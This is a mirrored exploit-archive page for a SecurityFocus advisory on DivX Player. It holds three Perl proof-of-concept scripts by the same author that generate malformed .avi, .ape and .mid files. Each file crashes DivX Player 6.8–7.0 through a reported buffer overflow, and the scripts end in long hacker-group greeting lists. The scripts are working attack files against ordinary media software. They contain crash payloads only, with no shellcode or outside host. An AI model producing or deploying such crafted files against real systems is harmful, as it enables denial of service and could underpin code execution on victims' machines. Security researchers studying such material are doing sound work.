扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 |
source: https://www.securityfocus.com/bid/47042/info DivX Player is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Attackers may leverage these issues to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. DivX Player 6.0, 6.8, 6.9, and 7.0 are vulnerable; other versions may also be affected. ================================ #!/usr/bin/perl ### # Title : DivX Player v7.0 (.avi) Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Overflow in 'DivX Player.exe' Process # Tested on : Windows XP SP3 Fran.ais # Target : DivX Player v6.8 & 6.9 & 7.0 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # Usage : 1 - Creat AVI file (14 bytes) #=>2 - Open AVI file With DivX Player #=>3 -OverFlow & Crshed !!! # ------------ # Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/11535) || By : cr4wl3r # ------------ # Assembly Error in [quartz.dll] ! 74872224() ! : # 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0 # 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ") # 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print "\n\n"; print "|============================================|\n"; print "|= [!] Name : DivX Player v6 & 7.0 AVI File =|\n"; print "|= [!] Exploit : Local Buffer Overflow=|\n"; print "|= [!] Author : KedAns-Dz =|\n"; print "|= [!] Mail: Ked-h(at)hotmail(dot)com =|\n"; print "|============================================|\n"; sleep(2); print "\n"; # Creating ... my $PoC = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; # AVI Header open(file , ">", "Kedans.avi"); # Evil File AVI (14 bytes) 4.0 KB print file $PoC; print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! "; close(file); # Thanks To : ' cr4wl3r ' From Indonesia & All Indonesia MusLim HacKers #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com *All Security and Exploits Webs ... #================================================================================================ ================================ #!/usr/bin/perl ### # Title : DivX Player v7.0 (.ape) Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Overflow in 'DivX Player.exe' Process # Tested on : Windows XP SP3 Fran.ais # Target : DivX Player v6.8 & 6.9 & 7.0 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # Usage : 1 - Creat APE file ( Monkey's Audio Format ) #=>2 - Open APE file With DivX Player #=>3 -OverFlow !!! # Assembly Error in [MonkeySource.ax] ! 0f4151a6() ! : # 0x0f4151a3 ,0xc2 0x80 0x00 [ret] || 8 # 0x0f4151a6 ,0xf7 0xf3 [div] || eax,abx << (" Error Here ") # 0x0f4151a8 ,0x31 0xd2 [xor] || edx,edx # 0x0f4151aa ,0xeb 0xf3 [jmp] || 0x0f41519f # 0x0f4151ac ,0xc3 [ret] || # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print "\n\n"; print "|===========================================================|\n"; print "|= [!] Name : DivX Player v6 & 7.0 || Monkey's Audio File=|\n"; print "|= [!] Exploit : Buffer Overflow Exploit =|\n"; print "|= [!] Author : KedAns-Dz=|\n"; print "|= [!] Mail: Ked-h(at)hotmail(dot)com=|\n"; print "|===========================================================|\n"; sleep(2); print "\n"; # Creating ... my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB print file $PoC; print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! "; close(file); #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com *All Security and Exploits Webs ... #================================================================================================ ================================ #!/usr/bin/perl ### # Title : DivX Player v7.0 (.mid) Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Overflow in 'DivX Player.exe' Process # Tested on : Windows XP SP3 Fran.ais # Target : DivX Player v6.8 & 6.9 & 7.0 ### # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ # Usage : 1 - Creat MID file #=>2 - Open MID file With DivX Player #=>3 -OverFlow !!! # ------------ # Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/9620) || By : PLATEN # ------------ # Assembly Error in [quartz.dll] ! 74872224() ! : # 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0 # 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ") # 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print "\n\n"; print "|===========================================|\n"; print "|= [!] Name : DivX Player v6 & 7.0 (.mid)=|\n"; print "|= [!] Exploit : Buffer Overflow Exploit =|\n"; print "|= [!] Author : KedAns-Dz=|\n"; print "|= [!] Mail: Ked-h(at)hotmail(dot)com=|\n"; print "|===========================================|\n"; sleep(2); print "\n"; # Creating ... my $PoC = # MID Header "\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54". "\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61". "\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d". "\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60". "\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6". "\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40". "\x00\xff\x2f\x00"; open(file , ">", "Kedans.mid"); # Evil File MID (100 bytes) 4.0 KB print file $PoC; print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! "; close(file); # Thanks To : ' PLATEN'& All Iranian MusLim HacKers #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com) # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , # www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com # www.metasploit.com * www.securityreason.com *All Security and Exploits Webs ... #================================================================================================ |
体验盒子
